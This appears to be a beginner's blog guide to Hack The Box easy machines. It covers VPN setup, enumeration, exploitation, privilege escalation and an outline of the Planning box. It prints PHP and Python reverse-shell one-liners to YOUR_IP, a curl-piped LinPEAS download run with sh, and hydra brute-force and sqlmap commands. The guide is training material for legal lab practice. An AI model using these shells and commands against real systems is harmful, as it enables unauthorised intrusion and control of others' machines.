The iconic black terminal. This is where every HTB journey begins — and this guide will make sure yours doesn’t end in frustration.
Introduction: “Easy” Is Relative — And That’s Okay
Let’s be honest with each other for a second.
You clicked on this post because you’ve probably stared at a Hack The Box machine for 20 minutes, run nmap, got some output you don’t fully understand, and thought:
“This is rated EASY?!”
You’re not alone. Every pentester — even the ones with OSCP certs and 10 years of experience — started exactly where you are. The word “Easy” on HTB doesn’t mean “beginner-friendly” by the everyday definition. As HTB themselves put it, “Easy” is only meaningful relative to some baseline. What’s easy for an experienced pentester can be brutally confusing for someone just starting out.
But here’s the good news: in 2026, the resources, guided modes, and community support around HTB have never been better. This guide is your starting point. Let’s go from zero to root — together.
Part 1: Setting Up Your Environment
Before you touch a single machine, you need a proper hacking lab. Don’t skip this step.
Kali Linux — the gold standard pentesting distro. Every tool you need is already installed. Focus on learning, not setup.
✅ What You Need
| Tool | Purpose | Where to Get |
|---|---|---|
| Kali Linux or Parrot OS | Your attack OS | kali.org / parrotsec.org |
| VirtualBox or VMware | Run your attack OS in a VM | Free downloads |
| HTB VPN Pack | Connect to HTB lab network | Your HTB dashboard |
| Burp Suite Community | Web app testing | portswigger.net |
| tmux | Multi-pane terminal (lifesaver) | Pre-installed on Kali |
Connecting to HTB VPN
# Download your .ovpn pack from HTB, then:
sudo openvpn your-htb-lab.ovpn
# Verify your tun0 interface is up:
ip addr show tun0💡 Pro Tip: Always verify your VPN IP with
ifconfig tun0before launching any attacks. If your reverse shell callback goes to the wrong IP, you’ll waste hours debugging something that isn’t broken.
Part 2: The HTB Machine Ecosystem (2026 Edition)
Understanding Difficulty Ratings
HTB offers machines in four tiers:
🟢 Easy → Assume you know Linux basics + basic enumeration
🟡 Medium → Requires chaining 2–3 vulnerabilities
🔴 Hard → Complex privilege escalation, custom exploits
💀 Insane → AI agents and elite hackers onlyStarting Point vs. Active Machines
As of 2026, HTB has evolved significantly:
- Starting Point — 28 Very Easy machines with walkthroughs and guided questions. Start here if you’re brand new.
- Guided Mode — Almost all retired Easy/Medium machines have a series of questions to guide you toward the intended path. Use it without shame.
- Retired Machines (VIP) — Come with community writeups. Perfect for learning methodology step by step.
Before HTB, sharpen your skills on TryHackMe. Guided rooms, beginner paths, and zero frustration setup — the perfect on-ramp to HTB.
🔑 Key Insight: There’s no shame in reading writeups for retired machines. The goal is to learn methodology, not to Google the flag.
Part 3: The Pentesting Methodology — Your Bible
Every time you spawn a machine, follow this framework without deviation:
┌─────────────────────────────────────────────┐
│ HTB ATTACK METHODOLOGY 2026 │
├─────────────────────────────────────────────┤
│ 1. RECONNAISSANCE → nmap, ping, headers │
│ 2. ENUMERATION → gobuster, ffuf, smb │
│ 3. EXPLOITATION → CVE, manual, payloads│
│ 4. FOOTHOLD → shell access │
│ 5. PRIV ESC → linpeas, sudo, suid │
│ 6. ROOT FLAG → /root/root.txt 🎉 │
└─────────────────────────────────────────────┘Step 1: Reconnaissance
# Full TCP scan — your first command on EVERY machine
nmap -sC -sV -oA recon/initial 10.10.11.XXX
# All ports scan (run in background)
nmap -p- --min-rate 5000 -oA recon/allports 10.10.11.XXX
# UDP scan for bonus ports
sudo nmap -sU --top-ports 20 10.10.11.XXXWhat to look for in Nmap output:
- Port 22 (SSH) — note the version
- Port 80/443 (HTTP/HTTPS) — always visit in browser
- Port 445 (SMB) — check for shares
- Port 5985 (WinRM) — Windows remote management
- Any non-standard ports — always investigate
Network enumeration is not optional — it’s the foundation of every successful HTB solve. Run nmap first, read the output carefully, and map every open port before touching anything.
Step 2: Enumeration
This is where most beginners give up. Don’t. Enumeration is 70% of the solve.
# Web directory bruteforce
gobuster dir -u http://10.10.11.XXX -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
# Virtual host / subdomain enumeration (critical for many HTB machines!)
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt \
-u http://target.htb \
-H "Host: FUZZ.target.htb" \
-fs 178
# SMB enumeration (Windows boxes)
netexec smb 10.10.11.XXX -u '' -p '' --shares
enum4linux -a 10.10.11.XXX🛑 Don’t Forget /etc/hosts!
Many HTB machines use virtual host routing. When nmap reveals a hostname likeplanning.htb, immediately add it:
echo "10.10.11.XXX planning.htb" | sudo tee -a /etc/hosts
Step 3: Exploitation
For Easy machines, exploitation usually falls into one of these categories:
| Vulnerability Type | Tools/Approach |
|---|---|
| Public CVE | Search servicename version exploit on Google / ExploitDB |
| Default credentials | Try admin:admin, admin:password, service-specific defaults |
| File upload bypass | Upload PHP webshell via image upload |
| SQL Injection | sqlmap -u "http://target/page?id=1" --dbs |
| LFI/RFI | /etc/passwd traversal, log poisoning |
# Search for exploits
searchsploit apache 2.4.49
searchsploit -m 50383 # Copy exploit to current directory
# Or use Metasploit
msfconsole
search type:exploit name:grafana
use exploit/multi/http/grafana_plugin_rceStep 4: Getting a Shell
# The classic Pentest Monkey reverse shell (PHP)
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>
# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# Always start your listener first!
nc -lvnp 4444💡 Upgrade Your Shell: A raw netcat shell is painful. As soon as you land a shell, upgrade it:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then Ctrl+Z, type: stty raw -echo; fgStep 5: Privilege Escalation 👑
This is the final boss. Run enumeration tools first:
That moment when
whoamireturnsroot— there’s nothing like it. LinPEAS gets you there faster than any other PrivEsc tool.
# Download and run LinPEAS (Linux PrivEsc Swiss Army Knife)
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Manual checks every pentester does:
sudo -l # What can this user run as sudo?
find / -perm -4000 2>/dev/null # SUID binaries
cat /etc/crontab # Cron jobs
ls -la /home/*/ # Other users' home dirs
env # Environment variablesCommon PrivEsc paths on Easy machines:
sudomisconfiguration (run command as root without password)- SUID binary abuse → check GTFOBins
- Writable cron job scripts
- Password reuse (found in configs,
.bash_history, etc.) - Vulnerable software version running as root
Part 4: Real Easy Machine Walkthrough Example
Let’s walk through a typical Easy Linux machine flow using HTB Planning as a template (based on real 2026 HTB methodology):
Target: planning.htb (10.10.11.XXX)
OS: Linux
Skill: Web enumeration, CVE exploitation1. Nmap reveals ports 22 and 80
nmap -sC -sV planning.htb
# → PORT 22/tcp open ssh
# → PORT 80/tcp open http2. Visit port 80 — looks like a plain site. Time for vhost enumeration:
ffuf -w bitquark-subdomains-top100000.txt \
-u http://planning.htb \
-H "Host: FUZZ.planning.htb" \
-fs 178
# → Found: grafana.planning.htb ✅3. Add to /etc/hosts, visit grafana subdomain
- See Grafana version at the footer:
11.0.0 - Search:
grafana 11.0.0 vulnerability→ CVE-2024-9264 (authenticated RCE) - Default creds
admin:adminwork → logged in as admin
4. Exploit CVE-2024-9264 → RCE → Reverse Shell
5. Linpeas reveals writable cron job → escalate to root 🎉
cat /root/root.txt → HTB{y0u_4r3_n0w_r007}🛠️ Part 5: Essential Tools Cheatsheet
# === RECONNAISSANCE ===
nmap -sC -sV -p- --min-rate 5000 TARGET
# === WEB ===
gobuster dir -u URL -w WORDLIST -x php,txt,html
ffuf -w WORDLIST -u URL/FUZZ
nikto -h http://TARGET
# === SMB (Windows) ===
netexec smb TARGET -u USER -p PASS --shares
smbclient //TARGET/share -U USER
# === PASSWORDS ===
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://TARGET
john --wordlist=rockyou.txt hash.txt
hashcat -m 1000 hash.txt rockyou.txt
# === PRIV ESC ===
linpeas.sh
winpeas.exe
sudo -l
find / -perm -4000 2>/dev/nullPart 6: The 2026 Beginner Roadmap
Follow this progression and you’ll be rooting Easy machines confidently within 60–90 days:
Week 1–2: HTB Academy free modules (Linux, Networking, Web basics)
Week 3–4: HTB Starting Point (28 Very Easy machines with walkthroughs)
Month 2: Retired Easy machines + read writeups after each attempt
Month 3: Active Easy machines solo — no walkthroughs
Month 4+: Medium machines, OSCP prep, CTF competitionsRecommended HTB Academy Modules (Free):
- Linux Fundamentals
- Web Requests
- Introduction to Networking
- JavaScript Deobfuscation
- SQL Injection Fundamentals
🔑 Key Takeaways
- Methodology beats tools — Always follow Recon → Enumerate → Exploit → PrivEsc
- Enumeration is king — Most beginners find nothing because they enumerate too fast and too shallow
- GTFOBins and HackTricks are your best friends for PrivEsc
- /etc/hosts is not optional — Virtual host routing is on almost every HTB web machine
- There’s no shame in writeups — Learn the methodology, not just the flag
- Upgrade your shell — A proper PTY shell saves hours of frustration
Final Words
The moment you get that first root shell — when the terminal spits back root@machine:~# for the first time — is genuinely one of the most satisfying feelings in this field. It doesn’t matter how long it took or how many hints you needed.
Keep hacking. Stay curious. Document everything.
Happy Hacking!
Found this useful? Share it with a fellow beginner. Drop your first rooted machine in the comments below — we’d love to celebrate with you!
SEO Keywords: HTB beginner guide 2026, Hack The Box easy machines, how to solve HTB, HTB methodology, nmap enumeration, privilege escalation linux, HackTheBox tutorial, gobuster ffuf htb, linpeas privilege escalation
Comments